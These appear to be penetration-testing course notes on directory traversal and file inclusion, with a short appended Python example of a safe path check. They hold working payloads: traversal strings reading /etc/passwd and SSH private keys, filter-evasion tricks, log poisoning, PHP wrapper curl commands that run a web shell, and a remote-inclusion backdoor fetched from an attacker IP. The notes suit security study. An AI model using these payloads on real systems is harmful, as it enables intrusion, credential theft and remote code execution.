Directory Traversal
Enumerate Users
../../../../../../../../../../../../../etc/passwd
Read SSH Private Keys
../../../../../../../../../../../../../home/offsec/.ssh/id_rsa
| Protection | Evasion |
| --- | --- |
| Removal of path traversal characters: ../ | 1. Use ....///// , which becomes ../ after sanitization; 2. URL encode |
| Approved path | Go to the approved path, then go back |
| Append extension in the backend | |
File Inclusion
Local File Inclusion (LFI)
- Identify a local file on the server to which we can add source code (e.g. the web application log file)
- Insert payload code into the local file (log poisoning)
- Exploit local file inclusion vulnerability to execute that file
Log path on Linux (Apache):
../../../../../../../../../var/log/apache2/access.log
Log path on Windows (XAMPP):
C:\xampp\apache\logs\access.log
Use of PHP Wrapper
php://filter
The php://filter wrapper makes the application include the contents of the file only, without executing it.
curl http://mountaindesserts.com/meteor/index.php?page=php://filter/resource=admin.php
curl http://mountaindesserts.com/meteor/index.php?page=php://filter/convert.base64-encode/resource=admin.php
data://
The data:// wrapper makes the application interpret the included contents as source code.
curl "http://mountaindesserts.com/meteor/index.php?page=data://text/plain,<?php%20echo%20system('ls');?>"
echo -n '<?php echo system($_GET["cmd"]);?>' | base64
curl "http://mountaindesserts.com/meteor/index.php?page=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==&cmd=ls"
Remote File Inclusion (RFI)
- Host a web server on the attacker machine to serve the remote file to be included
- Make a request to the target web application so that it connects to the attacker's server
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; } ?>
python3 -m http.server 80
curl "http://mountaindesserts.com/meteor/index.php?page=http://192.168.119.3/simple-backdoor.php&cmd=ls"
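Added example (not from the original notes) showing, from the defender's side, why the evasions in the table above work: a single-pass filter that strips `../` is placed beside a canonicalising check that decodes the input, resolves it under a fixed directory, appends the extension and refuses the `php://`, `data:` and `http://` wrapper forms used in the file-inclusion sections. The base directory `/srv/app/pages` and the `.php` extension are assumptions.

```python
import os
import re
from urllib.parse import unquote


def naive_sanitize(user_path: str) -> str:
    """Flawed filter from the table: strips '../' in one pass.
    '....//' survives as '../' and '%2e%2e%2f' is not touched at all."""
    return user_path.replace("../", "")


# Anything that starts with a URL scheme (php:, data:, http:, ...) is a
# stream wrapper, not a file name; data: may appear without '//'.
_SCHEME = re.compile(r"^[A-Za-z][A-Za-z0-9+.\-]*:")


def safe_resolve(base_dir: str, user_path: str, ext: str = ".php"):
    """Return the absolute file path if it stays inside base_dir, else None."""
    decoded = unquote(user_path)            # check what the file system will see
    if _SCHEME.match(decoded):              # reject php://, data:, http://, ...
        return None
    if not decoded.endswith(ext):           # server-side extension append
        decoded += ext
    base = os.path.realpath(base_dir)       # hypothetical approved directory
    full = os.path.realpath(os.path.join(base, decoded))
    if os.path.commonpath([base, full]) != base:
        return None                         # escaped the approved directory
    return full
```

The canonicalising check treats `....//` as an ordinary (non-existent) directory name, so the request stays under the base directory instead of being rewritten into a traversal.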